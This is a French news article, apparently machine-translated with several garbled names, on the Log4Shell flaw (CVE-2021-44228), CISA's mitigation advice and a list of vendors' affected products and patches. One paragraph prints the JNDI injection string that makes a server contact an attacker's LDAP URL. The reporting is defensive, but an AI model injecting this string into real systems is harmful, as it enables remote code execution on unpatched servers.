L’annonce d’une vulnérabilité critique dans la bibliothèque de journalisation Apache Log4j a éclaté la semaine dernière lorsque des exploits de preuve de concept ont commencé à émerger jeudi.
Log4j est un framework de journalisation Java open source faisant partie des services de journalisation Apache, utilisé au niveau de l’entreprise dans diverses applications de fournisseurs du monde entier.
Apache a publié Log4j 2.15.0 pour corriger la vulnérabilité de gravité maximale, actuellement suivie comme CVE-2021-44228, également appelé Log4Shell ou LogJam.
Alors que l’exploitation massive n’a commencé qu’après la mise à disposition gratuite du code d’exploitation, des attaques ont été détectées depuis le début du mois, selon les données de Cloudflare et Cisco Talos.
La faille Log4Shell a été signalée par l’équipe de sécurité cloud d’Alibaba le 24 novembre et on ne sait pas comment certains attaquants ont pu l’exploiter si rapidement.
Dans une déclaration samedi sur la vulnérabilité Log4Shell, Jen Easterly, directrice de la Cybersecurity and Infrastructure Security Agency (CISA), a déclaré que l’agence travaillait avec des partenaires des secteurs privé et public pour résoudre le problème.
« Nous prenons des mesures urgentes pour atténuer cette vulnérabilité et détecter toute activité menaçante associée. Nous avons ajouté cette vulnérabilité à notre catalogue de vulnérabilités exploitées connues, ce qui oblige les agences civiles fédérales – et signale aux partenaires non fédéraux – à corriger ou corriger de toute urgence cette vulnérabilité » – Jen de l’Est, directeur du CISA
Log4Shell est une injection Java Naming and Directory Interface (JNDI) qui permet l’exécution de code à distance non authentifié. Les adversaires peuvent l’exploiter en remplaçant l’agent utilisateur dans leur navigateur par une chaîne au format suivant : ${jndi:ldap://[attacker_URL]}.
La chaîne restera dans les journaux du serveur Web victime et forcera un rappel ou une requête vers l’URL de l’attaquant lorsque la bibliothèque Log4j l’analysera. Les attaquants peuvent utiliser la chaîne pour transmettre des commandes codées ou des classes Java à la machine vulnérable.
Avis, avis, correctifs ou mises à jour
Compte tenu de la gravité de la vulnérabilité et de la facilité de son exploitation, CISA a publié aujourd’hui des conseils aux entreprises pour mettre en place des défenses contre les attaques Log4Shell. La recommandation de l’agence est d' »appliquer les correctifs disponibles immédiatement » et de prioriser ce processus.
« Donnez la priorité aux correctifs, en commençant par les systèmes essentiels à la mission, les systèmes connectés à Internet et les serveurs en réseau. CISA
Si le patch n’est pas possible, l’agence recommande la modification suivante :
Définissez log4j2.formatMsgNoLookups sur true en ajoutant la chaîne -Dlog4j2.formatMsgNoLookups=True à la commande Java Virtual Machine pour démarrer une application
Cela vient avec la mise en garde que la journalisation du système peut être affectée s’il s’appuie sur les recherches pour le formatage des messages. De plus, l’atténuation ne fonctionne que pour les versions 2.10 et ultérieures.
Immédiatement après que les détails sur Log4Shell ont été connus, les fournisseurs ont commencé à rechercher si leurs produits étaient impactés et ont fourni des informations sur les résultats :
Amazone:
Amazon a mis à jour plusieurs de ses produits pour utiliser une version non vulnérable du composant Log4j et a annoncé qu’il est soit en train de mettre à jour d’autres, soit qu’il publiera de nouvelles versions dans un proche avenir.
La société a détails publiés spécifiques aux services concernés, parmi lesquels OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass et API Gateway.
Atlassian :
Sur la base de son évaluation, la société estime qu’aucun produit sur site n’est vulnérable à l’exploitation dans sa configuration par défaut.
La modification de la configuration de journalisation par défaut (log4j.properties) pour activer la fonctionnalité JMS Appender peut entraîner le risque d’exécution de code à distance dans certains produits, comme Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Centre de données, Fisheye et Crucible.
Broadcom :
L’entreprise publié atténuations et articles de la base de connaissances pour plusieurs produits Symantec affectés par la vulnérabilité Log4j. Ceux-ci incluent CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-on), VIP Authentication Hub et Symantec Endpoint Protection Manager (SEPM).
Cisco :
Cisco a publié une liste de ses produits affectés par Log4Shell ainsi qu’un calendrier pour corriger certains d’entre eux à partir du 14 décembre.
Les produits concernés appartiennent à diverses catégories, dont les suivantes :
- Dispositifs de sécurité du réseau et du contenu (moteur de services d’identité, Firepower Threat Defense, application de rapport de sécurité Web avancée)
- Collaboration et médias sociaux (Cisco Webex Meetings Server)
- Gestion et approvisionnement du réseau (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
- Routage et commutation d’entreprise (Cisco Network Assurance Engine et Cisco SD-WAN vManage)
Citrix :
Alors que l’enquête est toujours en cours et que le statut peut changer pour certains de ses produits, Citrix n’a répertorié aucun de ses produits comme étant vulnérable à Log4Shell.
ConnectWise :
Le service cloud de l’entreprise, Perch, s’est avéré s’appuyer sur des composants tiers qui étaient « potentiellement vulnérables », indique un consultatif de ConnectWise.
Le tiers vulnérable a été identifié comme étant FortiSIEM de FortiGuard, qui est utilisé par la solution StratoZen de ConnectWise, ce qui a incité l’entreprise à restreindre temporairement l’accès aux serveurs StratoZen hébergés. L’accès est désormais rétabli à la plupart des services.
cPanel :
Un fil de discussion montre que seules les instances où le plugin cPanel Solr est présent sont affectées et pourraient être exploitées, mais uniquement localement.
Un membre du personnel a ajouté une tranquillité d’esprit en annonçant qu’un mise à jour avec atténuation pour Log4Shell est disponible pour le package cpanel-dovecot-solr.
Debian :
Le paquet Log4j corrigé a été ajouté à Debian 9 (Stretch), 10 (Buster), 11 (Bullseye) et 12 (Bookworm) en tant que mise à jour de sécurité, lit le consultatif.
Docker:
Une douzaine d’images officielles de Docker ont été trouvées pour utiliser une version vulnérable de la bibliothèque Log4j. La liste comprend base de canapé, recherche élastique, logstash, sonarqube, et solr.
Docker dit qu’il est « en train de mettre à jour Log4j 2 dans ces images vers la dernière version disponible » et que les images peuvent ne pas être vulnérables pour d’autres raisons.
FortiGuard :
Un avis de la société répertorie près d’une douzaine de ses produits comme étant vulnérables, avec des correctifs ou des atténuations déjà déployés pour quatre d’entre eux.
FortiGuard a annoncé que le consultatif serait mis à jour avec les dates d’application des correctifs pour d’autres produits, tels que FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy et ShieldX.
F-Secure :
Les versions Windows et Linux de plusieurs produits F-Secure sont impactées par Log4Shell : Policy Manager (uniquement le composant Policy Manager Server), Policy Manager Proxy, Endpoint Proxy et Elements Connector.
La société a créé un correctif de sécurité pour les administrateurs afin de corriger le problème et a fourni instructions étape par étape pour le déployer.
Ghidra :
L’outil de rétro-ingénierie open source de la NSA a reçu un mettre à jour vers la version 10.1 qui met également à niveau la dépendance Log4j vers une itération non vulnérable.
IBM :
IBM consultatif for Log4Shell montre que seules les versions 9.0 et 8.5 de WebSphere Application Server ont été affectées par la vulnérabilité, via la console d’administration et les composants de l’application de registre UDDI, et que le problème a été résolu.
Réseaux Juniper :
L’entreprise de réseautage divulgué que quatre de ses produits sont concernés : Paragon Active Assurance, Paragon Insights, Paragon Pathfinder et Paragon Planner.
Pendant que l’évaluation se poursuit, à ce stade, six autres produits peuvent être affectés : JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics et Security Director (pas Security Director Insights)
McAfee :
L’entreprise n’a pas encore terminé son évaluation et a 12 produits en cours d’examen et mettra à jour le consultatif avec les informations pertinentes dès qu’elles sont disponibles.
MongoDB :
Seul MongoDB Atlas Search devait être corrigé par rapport à Log4Shell, note la société dans un consultatif mis à jour aujourd’hui
Le développeur ajoute qu’il n’a trouvé aucune preuve d’exploitation ou d’indicateurs de compromission avant de déployer le correctif.
Okta :
Okta mises à jour publiées pour Okta RADIUS Server Agent et Okta On-Prem MFA Agent pour atténuer le risque de la vulnérabilité Log4Shell et recommande fortement aux clients d’appliquer les correctifs à partir de la console d’administration.
Oracle:
Oracle mentionné que « un certain nombre » de ses produits, sans révéler lesquels ni combien, utilisent une version vulnérable du composant Log4j.
La société a référé ses clients au document de support My Oracle et a publié un alerte de sécurité avec une forte recommandation d’appliquer les mises à jour fournies « dès que possible ».
Fondation OWASP :
Une consultatif a révélé vendredi que les versions du scanner d’applications Web Zed Attack Proxy (ZAP) inférieures à 2.11.1 utilisent un composant Log4j vulnérable.
Chapeau rouge:
Les composants de plusieurs produits Red Hat sont affectés par Log4Shell, l’organisation divulgué vendredi, en recommandant fortement aux clients d’appliquer les mises à jour dès qu’elles seront disponibles.
Parmi les produits répertoriés dans l’avis figurent Red Hat OpenShift 4 et 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8 et Red Hat Fuse 7.
Vents solaires :
Deux produits de l’entreprise utiliser une version vulnérable d’Apache Log4j : Server & Application Monitor (SAM) et Database Performance Analyzer (DPA).
Cependant, les deux produits utilisent une version du Java Development Kit (JDK) qui n’est pas sensible à la vulnérabilité Logj4 ou qui réduit le risque.
SonicWall :
Une enquête en cours a révélé que la version 10.x de la sécurité du courrier électronique de SonicWall est affectée par la vulnérabilité Log4Shell. Un correctif est en cours de développement et devrait être publié « sous peu ».
Cinq autres produits de SonicWall sont toujours en cours d’examen et le reste d’entre eux n’a pas été affecté par le problème, selon un consultatif de la société pour la dernière fois mis à jour le samedi.
Splunk :
Core Splunk Enterprise n’est pas affecté, sauf si Data Fabric Search est utilisé. La société a publié un tableau avec les versions de ses produits concernés par Log4Shell à la fois dans le cloud et sur site.
Au moment de la rédaction, la société a correctifs publiés pour certains produits et travaille actuellement sur des mises à jour progressives pour au moins sept de ses produits.
VMware :
VMware a corrigé plusieurs de ses produits vulnérables aux attaques Log4Shell et travaille actuellement au déploiement de correctifs pour 27 autres produits.
Dans un consultatif Dernière mise à jour aujourd’hui, la société répertorie près de 40 de ses produits comme étant touchés par la vulnérabilité critique. Beaucoup d’entre eux affichent un « Patch en attente » et des mesures d’atténuation sont disponibles dans certains cas.
Ubiquiti :
L’application réseau UniFi, qui utilise la bibliothèque Log4j, a été mis à jour pour remédier à la vulnérabilité critique de Log4Shell.
Ubuntu :
Le package Log4j a été patché en amont, lit le avis de sécurité, et la mise à jour doit maintenant s’appliquer à Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo) et 21.10 (Impish Indri).
Zoho :
La société a découvert que le composant ADAudit Plus pour l’audit des modifications d’Active Directory, qui fait partie de la solution de surveillance ManageEngine, est vulnérable aux attaques Log4Shell.
Dans un court article aujourd’hui, Zoho a instructions fournies pour atténuer le problème.
Zscaler :
Zscaler a patché plusieurs de ses produits qui utilisaient une version vulnérable de la bibliothèque Log4j. Après avoir corrigé tous ses services d’accès privé (ZPA) face à l’Internet public, Zscaler Mobile Admin et Support Mobile Admin, la société a conclu que le problème avait été résolu dans tous ses produits.
Certaines entreprises peuvent choisir de ne pas prendre de mesures contre la vulnérabilité Log4Shell, estimant que l’exécution de certaines versions de Java diffuse toute tentative d’exploitation. Ce n’est pas vrai, cependant, et ils devraient mettre à jour la bibliothèque Log4j à son itération la plus récente.
Márcio Almeida, ingénieur en sécurité senior chez Canva, la plate-forme de conception graphique avertit que les attaques Log4Shell fonctionnent avec n’importe quelle version de Java lors de l’ajout de la prise en charge des charges utiles sérialisées LDAP dans le kit d’exploitation JNDI.
Le chercheur explique que pour que l’attaque fonctionne avec n’importe quelle version de Java, les classes utilisées dans la charge utile sérialisée doivent se trouver dans le chemin de classe de l’application.